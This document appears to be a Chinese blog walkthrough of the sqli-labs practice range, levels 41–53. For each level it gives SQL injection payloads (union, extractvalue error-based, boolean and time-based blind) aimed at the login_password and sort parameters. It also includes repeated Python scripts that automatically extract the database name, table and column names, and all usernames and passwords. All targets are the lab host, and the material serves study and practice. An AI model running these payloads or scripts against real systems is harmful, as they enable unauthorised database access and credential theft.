sqli.labs靶场(41-53关)

41、第四十一关

-1 union select 1,2,3--+

-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+

42、第四十二关

这关login_password是单引号闭合,可用布尔盲注

123'+or+1=1--+

上脚本爆库:

复制代码
import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-42/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

43、第四十三关

这关是POST请求,login_password参数单引号加括号闭合

POC:111')--+,有报错信息,可以用报错注入

111')+and+extractvalue(1,concat(0x7e,database(),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users),0x7e))--+

44、第四十四关

POST请求,login_password参数单引号闭合

可以用布尔盲注,POC:123'+or+lenth(database())=1--+

这个脚本注入比较方便

复制代码
import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-44/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

45、第四十五关

这关是login_password参数单引号加括号闭合

可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+

脚本爆库

复制代码
import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-45/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123') or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123') or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

46、第四十六关

参数是sort

4+and+extractvalue(1,concat(0x7e,database()))

4+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

4+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ))

47、第四十七关

sort=1

sort=2

sort=3

sort=4

应该是报错了,一共三个字段,不显示错误可以用时间盲注

48、第四十八关

和上一关差不多,这关单引号闭合

还是要时间盲注

脚本

复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-48/?sort=1%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

49、第四十九关

和48关差不多,也是时间盲注,需要单引号闭合

上脚本

复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-49/?sort=1%27%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

50、第五十关

有报错信息,试一下报错注入

sort=10+and+extractvalue(1,concat(0x7e,database()))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))

51、第五十一关

有报错信息,还得报错注入,单引号闭合

sort=3'+and+extractvalue(1,concat(0x7e,database()))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))--+

52、第五十二关

没有报错信息,得用盲注,时间盲注

上脚本

复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-52/?sort=1%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

53、第五十三关

单引号闭合,没有报错,还得是盲注

上脚本

python 复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-53/?sort=22%27%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                users = f"{users}{a}"
                print(a, end='')
                num = 0
相关推荐
ylfhpy1 小时前
Java面试黄金宝典30
java·数据库·算法·面试·职场和发展
Y1nhl1 小时前
Pyspark学习一:概述
数据库·人工智能·深度学习·学习·spark·pyspark·大数据技术
我有医保我先冲7 小时前
SQL复杂查询与性能优化:医药行业ERP系统实战指南
数据库·sql·性能优化
快来卷java7 小时前
MySQL篇(一):慢查询定位及索引、B树相关知识详解
java·数据结构·b树·mysql·adb
阳光_你好8 小时前
详细说明Qt 中共享内存方法: QSharedMemory 对象
开发语言·数据库·qt
喝醉酒的小白9 小时前
MySQL响应慢是否由堵塞或死锁引起?
数据库
Pasregret9 小时前
04-深入解析 Spring 事务管理原理及源码
java·数据库·后端·spring·oracle
jnrjian9 小时前
归档重做日志archived log (明显) 比redo log重做日志文件小
数据库·oracle
TDengine (老段)9 小时前
TDengine 中的命名与边界
大数据·数据库·物联网·oracle·时序数据库·tdengine·iotdb
谁家有个大人10 小时前
MYSQL中对行与列的操作
数据库·mysql